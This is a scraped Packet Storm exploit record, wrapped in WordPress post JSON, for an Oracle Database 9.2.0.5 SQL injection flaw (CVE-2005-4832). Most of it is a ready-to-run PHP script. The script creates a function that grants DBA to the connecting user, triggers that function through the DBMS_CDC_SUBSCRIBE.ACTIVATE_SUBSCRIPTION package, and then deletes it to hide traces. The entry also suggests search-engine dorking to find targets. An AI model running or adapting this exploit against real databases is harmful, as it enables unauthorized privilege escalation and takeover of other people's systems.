{“lastseen”:”2026-02-13T18:05:49″,”description”:”Oracle Database Server version 9.2.0.5 proof of concept remote SQL injection exploit that leverages SYS.DBMSCDCSUBSCRIBE.ACTIVATESUBSCRIPTION and makes use of an older vulnerability from 2005…”,”published”:”2026-02-13T00:00:00″,”modified”:”2026-02-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Oracle Database Server 9.2.0.5 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:215533″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2005-4832″],”sourceData”:”=============================================================================================================================================\\n | # Title : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 135.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.oracle.com\/ |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Dorking \u0130n Google Or Other Search Enggine.\\n \\n [+] Code Description: SQL injection vulnerability in Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package.\\n \\n (Related : https:\/\/packetstorm.news\/files\/id\/180720\/ Linked CVE numbers: CVE-2005-4832 ) .\\n \\t\\n [+] save code as poc.php.\\n \\n [+] Set target : line 3 + 4 + 5 + 6 + 7\\n \\n [+] PayLoad :\\n \\n \\u003c?php\\n \/\/ \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0642\u0627\u0639\u062f\u0629 \u0628\u064a\u0627\u0646\u0627\u062a Oracle\\n $host = \\”localhost\\”; \/\/ \u0627\u0633\u062a\u0628\u062f\u0644\u0647\u0627 \u0628\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631\\n $port = \\”1521\\”; \/\/ \u0645\u0646\u0641\u0630 Oracle\\n $sid = \\”ORCL\\”; \/\/ \u0645\u0639\u0631\u0641 \u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n $user = \\”victim_user\\”; \/\/ \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\\n $password = \\”victim_password\\”; \/\/ \u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u0631\u0648\u0631\\n \\n try {\\n $dsn = \\”oci:dbname=$host:$port\/$sid;charset=UTF8\\”;\\n $conn = new PDO($dsn, $user, $password);\\n $conn-\\u003esetAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\\n \\n echo \\”[+] \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0628\u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0646\u0627\u062c\u062d!\\\\n\\”;\\n \\n \/\/ \u0627\u0633\u0645 \u062f\u0627\u0644\u0629 \u0639\u0634\u0648\u0627\u0626\u064a\u0629\\n $func_name = \\”h4ck\\” . rand(1000, 9999);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 \u062f\u0627\u0644\u0629 \u062a\u0642\u0648\u0645 \u0628\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 SQL \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0627\u0644\u064a\u0629\\n $function = \\”\\n CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2\\n AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;\\n BEGIN\\n EXECUTE IMMEDIATE ‘GRANT DBA TO $user’;\\n RETURN ”;\\n END;\\n \\”;\\n \\n \/\/ \u0627\u0633\u062a\u0639\u0644\u0627\u0645 \u0627\u0644\u062d\u0642\u0646\\n $injection = \\”\\n BEGIN\\n sys.dbms_cdc_subscribe.activate_subscription(”’||$func_name()||”’);\\n END;\\n \\”;\\n \\n \/\/ \u062d\u0630\u0641 \u0627\u0644\u062f\u0627\u0644\u0629 \u0628\u0639\u062f \u0627\u0644\u062a\u0646\u0641\u064a\u0630\\n $clean = \\”DROP FUNCTION $func_name\\”;\\n \\n echo \\”[+] \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062f\u0627\u0644\u0629 \u0627\u0644\u0636\u0627\u0631\u0629…\\\\n\\”;\\n $conn-\\u003eexec($function);\\n \\n try {\\n echo \\”[+] \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0646\u0641\u064a\u0630 \u062d\u0642\u0646 SQL…\\\\n\\”;\\n $conn-\\u003eexec($injection);\\n } catch (Exception $e) {\\n echo \\”[-] \u0641\u0634\u0644 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062d\u0642\u0646: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n } finally {\\n echo \\”[+] \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0622\u062b\u0627\u0631…\\\\n\\”;\\n $conn-\\u003eexec($clean);\\n }\\n \\n echo \\”[+] \u0627\u0646\u062a\u0647\u0649 \u0627\u0644\u062a\u0646\u0641\u064a\u0630.\\\\n\\”;\\n } catch (PDOException $e) {\\n die(\\”[-] \u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u0627\u062a\u0635\u0627\u0644: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”);\\n }\\n ?\\u003e\\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215533″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:N\/C:P\/I:P\/A:P”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215533\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-13T18:05:49″,”description”:”Oracle Database Server version 9.2.0.5 proof of concept remote SQL injection exploit that leverages SYS.DBMSCDCSUBSCRIBE.ACTIVATESUBSCRIPTION and makes use of an older vulnerability from 2005…”,”published”:”2026-02-13T00:00:00″,”modified”:”2026-02-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Oracle…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-40782","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n